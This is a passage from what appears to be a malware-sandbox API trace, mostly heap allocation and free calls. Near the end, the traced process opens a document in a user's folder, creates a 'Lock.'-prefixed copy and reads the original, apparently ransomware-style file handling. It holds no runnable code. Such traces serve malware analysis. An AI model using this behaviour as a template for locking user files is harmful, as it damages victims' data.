RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0266.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0266.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0266.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.073] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.073] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.073] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.073] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/rq5tKC1of8p4r7HR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rq5tkc1of8p4r7hr.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0266.074] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.074] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0266.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0266.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.rq5tKC1of8p4r7HR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.rq5tkc1of8p4r7hr.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0266.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0266.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0266.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.077] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0266.077] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x71c1, lpOverlapped=0x0) returned 1 [0266.078] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0266.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x71c1) returned 0x3571018 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0266.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.084] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0266.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0266.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x71c1) returned 0x3571018 [0266.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.085] 